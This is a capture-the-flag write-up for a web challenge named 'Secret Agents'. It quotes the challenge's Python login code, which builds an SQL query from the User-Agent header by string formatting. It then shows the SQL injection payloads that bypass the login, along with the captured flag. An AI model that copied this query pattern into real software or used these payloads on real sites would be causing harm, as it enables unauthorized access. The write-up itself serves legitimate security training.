## SECRET AGENTS 

* **Category:** Web
* **Points:** 110
* **Author(s):** b0uldrr

---

### Challenge
```
Can you enter the secret agent portal? I've heard someone has a flag :eyes:
Our insider leaked the source, but was "terminated" shortly thereafter...

Author: JoshDaBosh
```
### Hints
How does the site know who you are?

### Downloads
* [app.py](app.py)

---

### Solution

We're provided with a website which has a link to a login page. Visiting that page just states "Stop! You're not allowed in here >:)".

We're also given the source code for the authentication for the login page, app.py. Of interest is the login function:

```
def login():
	u = request.headers.get("User-Agent")

	conn = mysql.connector.connect(
					**dbconfig
					)

	cursor = conn.cursor()

	#cursor.execute("SET GLOBAL connect_timeout=1")
	#cursor.execute("SET GLOVAL wait_timeout=1")	
	#cursor.execute("SET GLOBAL interactive_timeout=1")

	for r in cursor.execute("SELECT * FROM Agents WHERE UA='%s'"%(u), multi=True):
		if r.with_rows:
			res = r.fetchall()
			break

	cursor.close()
	conn.close()
```

The login function is checking the user agent of the request to complete an SQL query and log the user in.

I captured the sequence in Burp Suite. You can see the user agent of my browser and the response from the website in the red rectangles:

![attempt 1](images/attempt1.png)

I sent the request to the repeater and tried some standard SQL injection attacks in place of the user agent. My first SQL attack payload was:

```
' OR '1' = '1';
```

The response was a hint that I was close but "there are many secret agents of course!":

![attempt 2](images/attempt2.png)

I tried to limit the number of results I was getting by adding a limit to the SQL query:

```
' OR '1' = '1' LIMIT 0,1;
```

This logged me in as a user named GRU. I seemed to be on the right track, I just need to find the right user to log in as.

![attempt 3](images/attempt3.png)

After another 2 attempts, I found the right limit offset and the flag:

```
' OR '1' = '1' LIMIT 2,1;
```

![flag](images/flag.png)

---

### Flag
```
actf{nyoom_1_4m_sp33d}
```
